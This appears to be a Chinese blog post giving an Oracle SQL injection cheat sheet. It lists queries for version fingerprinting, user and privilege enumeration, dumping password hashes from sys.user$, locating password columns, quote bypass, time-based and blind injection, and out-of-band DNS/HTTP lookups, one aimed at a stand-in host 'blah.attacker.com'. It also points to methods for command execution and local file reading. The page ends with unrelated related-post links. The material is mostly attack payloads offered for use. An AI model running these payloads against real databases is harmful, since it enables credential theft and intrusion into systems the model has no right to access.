• Oracle注入速查表


    注:下面的一部分查询只能由admin执行,我会在查询的末尾以"-priv“标注。

    探测版本:

    SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
    SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;  
    SELECT version FROM v$instance;
    

    注释:

    SELECT 1 FROM dual — comment
    

    注: Oracle的SELECT语句必须包含FROM从句,所以当我们并不是真的准备查询一个表的时候,我们必须使用一个假的表名‘dual’

    当前用户:

    SELECT user FROM dual
    

    列出所有用户:

    SELECT username FROM all_users ORDER BY username;
    SELECT name FROM sys.user$; — priv
    

    列出密码哈希:

    SELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  astatus能够在acct被锁定的状态下给你反馈
    SELECT name,spare4 FROM sys.user$ — priv, 11g
    

    密码破解:

    checkpwd能够把Oracle8,9,10的基于DES的哈希破解掉

    列出权限:

    SELECT * FROM session_privs; —当前用户的权限
    SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, 列出指定用户的权限
    SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, 找到拥有某个权限的用户
    SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
    

    列出DBA账户:

    SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, 列出DBA和对应权限
    

    当前数据库:

    SELECT global_name FROM global_name;
    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance;
    SELECT SYS.DATABASE_NAME FROM DUAL;
    

    列出数据库:

    SELECT DISTINCT owner FROM all_tables; — 列出数据库 (一个用户一个)
    

    – 通过查询TNS监听程序能够查询到其他数据库.详情看tnscmd

    列出字段名:

    SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
    SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
    

    列出表名:

    SELECT table_name FROM all_tables;
    SELECT owner, table_name FROM all_tables;
    

    通过字段名找到对应表:

    SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;  
    

    — 注: 表名都是大写

    查询第N行:

    SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)
    

    查询第N个字符:

    SELECT substr(‘abcd’, 3, 1) FROM dual; — 得到第三个字符‘c’
    

    按位与(Bitwise AND):

    SELECT bitand(6,2) FROM dual; — 返回2
    SELECT bitand(6,1) FROM dual; — 返回0
    

    ASCII值转字符:

    SELECT chr(65) FROM dual; — 返回A
    

    字符转ASCII码:

    SELECT ascii(‘A’) FROM dual; — 返回65
    

    类型转换:

    SELECT CAST(1 AS char) FROM dual;
    SELECT CAST(’1′ AS int) FROM dual;
    

    拼接字符:

    SELECT ‘A’ || ‘B’ FROM dual; — 返回AB
    

    IF语句:

    BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; 
    

    — 跟SELECT语句在一起时不太管用

    Case语句:

    SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — 返回1
    SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — 返回2
    

    绕过引号:

    SELECT chr(65) || chr(66) FROM dual; — 返回AB
    

    延时:

    BEGIN DBMS_LOCK.SLEEP(5); END; — priv, 在SELECT中用不了
    SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 如果反查很慢
    SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — 如果正查很慢
    SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — 如果发送TCP包被拦截或者很慢
    

    — 更多关于延时的内容请看Heavy Queries

    发送DNS请求:

    SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
    SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
    

    命令执行:

    如果目标机装了JAVA就能执行命令,看这里

    有时候ExtProc也可以,不过我一般都成功不了,看这里

    本地文件读取:

    UTL_FILE有时候能用。如果下面的语句没有返回null就行。

    SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;
    

    JAVA能用来读取和写入文件,除了Oracle Express

    主机名称、IP地址:

    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT host_name FROM v$instance;
    SELECT UTL_INADDR.get_host_address FROM dual; — 查IP
    SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 查主机名称
    

    定位DB文件:

    SELECT name FROM V$DATAFILE;
    

    默认系统和数据库:

    SYSTEM
    SYSAUX
    

    额外小贴士:

    一个字符串列出所有表名:

    select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables 
    

    – 当你union联查注入的时候只有一行能用与返回数据时使用

    盲注排序:

    order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end 
    

    — 你必须知道两个拥有相同数据类型的字段名才能用

  • 相关阅读:
    直播源列表
    MySQL为什么"错误"选择代价更大的索引
    C#中ConfigureAwait的理解(作者Stephen)
    理解C#中的 async await
    C#中Task.Delay() 和 Thread.Sleep() 区别
    扁平结构数据变成嵌套结构数据(树状结构)
    判断两个数组相同 两个对象相同 js
    嵌套结构数据(树状结构)变成扁平结构不带子元素(children)
    嵌套结构数据(树状结构)变成扁平结构带有子元素(children)
    2022.1.11学习日志
  • 原文地址:https://www.cnblogs.com/songanwei/p/9153965.html
Copyright © 2020-2023  润新知